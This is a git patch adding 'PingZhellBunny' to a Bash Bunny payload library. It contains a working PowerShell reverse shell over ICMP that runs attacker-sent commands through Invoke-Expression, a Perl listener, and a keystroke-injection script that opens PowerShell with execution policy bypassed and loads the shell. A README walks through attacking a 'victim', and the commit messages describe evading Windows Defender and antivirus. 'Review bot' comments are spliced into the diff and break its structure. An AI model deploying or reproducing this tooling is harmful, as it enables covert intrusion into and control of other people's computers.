From b64503fe23489d713f024ad0ee9516635a82b9db Mon Sep 17 00:00:00 2001 
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Thu, 23 Dec 2021 22:42:21 +0100 Subject: [PATCH] Uploaded PingZhellBunny (#480) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away šŸ‡ * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md * Deleted ReverseBunny.txt Deleted because of higher risk to get caught by AV * Updated ReverseBunny to version 1.2 Updated ReverseBunny to version 1.2. - Deleted payload on disk because of AV - Added custom shell design * Updated ReverseBunny to version 1.2 Updated README for ReverseBunny update * Updated payload fixed some stupid left overs <3 * Uploaded pingUinBunny a reverse shell using icmp * Delete payloads/library/remote_access/switch1 directory * Uploaded pingUinBunny A reverse shell using icmp * Update README.md * Update README.md * Updated to PingZhell * Update Bunny.pl * Update README.md * Update README.md * Update payload.txt * Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl * Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 * Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md * Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt * Update payload.txt * Update README.md * Update README.md * Update Bunny.pl --- .../remote_access/PingZhellBunny/Bunny.pl | 66 ++++++++++++++ .../PingZhellBunny/PingZhell.ps1 | 86 +++++++++++++++++++ .../remote_access/PingZhellBunny/README.md | 41 +++++++++ 
.../remote_access/PingZhellBunny/payload.txt | 39 +++++++++
4 files changed, 232 insertions(+)
create mode 100644 payloads/library/remote_access/PingZhellBunny/Bunny.pl
create mode 100644 payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
create mode 100644 payloads/library/remote_access/PingZhellBunny/README.md
create mode 100644 payloads/library/remote_access/PingZhellBunny/payload.txt
diff --git a/payloads/library/remote_access/PingZhellBunny/Bunny.pl b/payloads/library/remote_access/PingZhellBunny/Bunny.pl
new file mode 100644
index 00000000..a00eb064
--- /dev/null
+++ b/payloads/library/remote_access/PingZhellBunny/Bunny.pl
@@ -0,0 +1,66 @@
+#!/usr/bin/env perl
+#
+# icmpsh - simple icmp command shell
+# Copyright (c) 2010, Nico Leidecker
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+#
+# Modified by 0iphor13 for PingZhell
+#
+#
+#
+#
+
+
+use strict;
+use IO::Socket;
+use NetPacket::IP;
+use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
+use Net::RawIP;
+use Fcntl;
+
+print "Bunny waitin' for connection...\n";
+
+# create raw socket
+my $sock = IO::Socket::INET->new(
+ Proto => "ICMP",
+ Type => SOCK_RAW,
+ Blocking => 1) or die "$!";
+
+# set stdin to non-blocking
+fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
+
+print "Let's wait for PingZhell!\n";
+
+my $input = '';
+while(1) {
+ if ($sock->recv(my $buffer, 4096, 0)) {
+ my $ip = NetPacket::IP->decode($buffer);
+ my $icmp = NetPacket::ICMP->decode($ip->{data});
+ if ($icmp->{type} == ICMP_ECHO) {
+ # get identifier and sequencenumber
+ my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
+
+ # write data to stdout and read from stdin
+ print $data;
+ $input = ;
+
+ # compile and send response
+ $icmp->{type} = ICMP_ECHOREPLY;
+ $icmp->{data} = pack("SSa*", $ident, $seq, $input);
+ my $raw = $icmp->encode();
+ my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
+ $sock->send($raw, 0, $addr) or die "$!\n";
+ }
+ }
+}
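Review bot: `use Net::RawIP;` in the import list is not referenced anywhere in this file — the raw socket is created with `IO::Socket::INET->new(... Type => SOCK_RAW ...)` and replies go out through `$sock->send` — and it is also the one module the README's dependency list omits, so it should either be dropped or documented; the file also has `use strict;` without `use warnings;`. The loop prints the payload of every ICMP_ECHO it decodes and answers whatever address `$ip->{src_ip}` carries, so the README's statement that it "listens for ICMP packets from a specific host" does not describe this code and should be reworded to match. As rendered, `$input = ;` and the licence line `If not, see .` have lost their angle-bracketed text, which looks like an extraction artefact rather than the committed source.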
diff --git a/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 b/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
new file mode 100644
index 00000000..2687d299
--- /dev/null
+++ b/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
@@ -0,0 +1,86 @@
+
+<#
+
+Original script by nishang - modified by 0iphor13 for PingZhell
+
+Use bunny.pl as a master
+
+When running the master, don't forget to disable ICMP replies by the OS. For example:
+$: sysctl -w net.ipv4.icmp_echo_ignore_all=1
+Then:
+$: perl bunny.pl
+
+Microsoft please don't block, oh dear microsoft corporation
+#>
+
+
+ $IPAddress = 'Attacker-IP'
+ $Delay = 5
+ $BufferSize = 128
+
+ #Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
+ $ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping
+ $PingOptions = New-Object System.Net.NetworkInformation.PingOptions
+ $PingOptions.DontFragment = $True
+ $MicrosoftCopyright =@"
+ _______ ___ __ _ _______ _______ __ __ _______ ___ ___
+| | | | | | | | | | | | | | |
+| _ | | |_| | ___|____ | |_| | ___| | | |
+| |_| | | | | __ ____| | | |___| | | |
+| ___| | _ | || | ______| | ___| |___| |___
+| | | | | | | |_| | |_____| _ | |___| | |
+|___| |___|_| |__|_______|_______|__| |__|_______|_______|_______|
+
+
+Windows PowerShell running as user $env:username on $env:computername `n
+"@;
+
+ # Copyright Copies Right
+ $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright)
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
+
+ #Does a german penguin just PingUin?
+ $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
+
+ while ($true)
+ {
+ $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('')
+ $reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions)
+
+ if ($reply.Buffer)
+ {
+ $response = ([text.encoding]::ASCII).GetString($reply.Buffer)
+ $result = (Invoke-Expression -Command $response 2>&1 | Out-String )
+ $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result)
+ $index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize)
+ $i = 0
+
+ #Fragmant larger output into smaller ones to send to the server.
+ if ($NeverGonnaGiveYouUp.length -gt $BufferSize)
+ {
+ while ($i -lt $index )
+ {
+ $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
+ $i +=1
+ }
+ $remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize
+ if ($remainingindex -ne 0)
+ {
+ $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
+ }
+ }
+ else
+ {
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
+ }
+ $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
+ }
+ else
+ {
+ Start-Sleep -Seconds $Delay
+ }
+ }
diff --git a/payloads/library/remote_access/PingZhellBunny/README.md b/payloads/library/remote_access/PingZhellBunny/README.md
new file mode 100644
index 00000000..fe1bcb23
--- /dev/null
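Review bot: The header comment says `Use bunny.pl as a master` and `$: perl bunny.pl`, but the script committed alongside is `Bunny.pl`, which on a case-sensitive filesystem is a different file; both lines should read `Bunny.pl`. The `Send` timeouts are bare literals that differ by a factor of ten — `60 * 1000` on the banner and prompt sends, `60 * 10000` on the output fragments — and nothing says why; naming them once at the top next to `$Delay` and `$BufferSize` (for example `$PromptTimeoutMs` and `$DataTimeoutMs`, with a one-line comment on the difference) would make the intent readable. It is also worth stating, here and in the README, that `$reply.Buffer` is handed straight to `Invoke-Expression -Command $response` with no origin or integrity check, so the channel is plaintext and unauthenticated. The README's description names Bunny.pl for both the agent and the master, while it is this script that executes the received text, so its first sentence should name PingZhell.ps1.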
+++ b/payloads/library/remote_access/PingZhellBunny/README.md
@@ -0,0 +1,41 @@
+**Title: PingZhellBunny**
+
+Author: 0iphor13
+
+Version: 1.3
+
+What is PingZhellBunny?
+#
+*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
+*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
+*ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
+*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
+*The client ICMP agent (Bunny.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
+*The server ICMP Agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhell.ps1) and sends it commands to execute.*
+#
+There you go, a reverse shell.
+
+**Instruction:**
+
+Upload Bunny.pl onto your attacking machine.
+Install dependencies, if needed:
+- IO::Socket
+- NetPacket::IP
+- NetPacket::ICMP
+
+Disable ICMP replies by the OS:
+ *sysctl -w net.ipv4.icmp_echo_ignore_all=1*
+
+Start Bunny.pl -> perl Bunny.pl
+#
+!!!Insert the IP of your attacking machine into PingZhell.ps1!!!
+#
+Plug in Bashbunny with PingZhellBunny equipped.
+Achieve reverse shell.
+run away <3
+
+
+Credit for code and ideas:
+- bdamele
+- nishang
+- krabelize
diff --git a/payloads/library/remote_access/PingZhellBunny/payload.txt b/payloads/library/remote_access/PingZhellBunny/payload.txt
new file mode 100644
index 00000000..ca6416ee
--- /dev/null
+++ b/payloads/library/remote_access/PingZhellBunny/payload.txt
@@ -0,0 +1,39 @@
+#!/bin/bash
+#
+# Title: PingZhellBunny
+# Description: Get remote access using a icmp reverse shell.
+# Author: 0iphor13
+# Version: 1.3
+# Category: Remote_Access
+# Attackmodes: HID, Storage
+
+LED SETUP
+
+DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+#After you have adapted the delays for your target, add "-W hidden"
+DELAY 5000
+RUN WIN "powershell -Exec Bypass -NoP -NonI"
+DELAY 6000
+Q ENTER
+
+DELAY 20000
+Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')"
+DELAY 20000
+Q ENTER
+DELAY 15000
+
+ATTACKMODE HID
+
+LED FINISH
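Review bot: `DUCKY_LANG de` hard-codes a German keyboard layout and neither the header block nor the README mentions it, yet every `Q STRING` keystroke, including the backslashes in the PingZhell.ps1 path, is mapped through that layout; a comment above it such as `# Keyboard layout the keystrokes are mapped through; set to match the host` plus a README line stating the default would save a puzzling failure. The header's `Description: Get remote access using a icmp reverse shell.` should read `an ICMP reverse shell`, and `Attackmodes` could note that the script switches from `HID STORAGE` to `HID` at the end, which the `#LED STAGE1 - DON'T EJECT` comment hints at but does not explain.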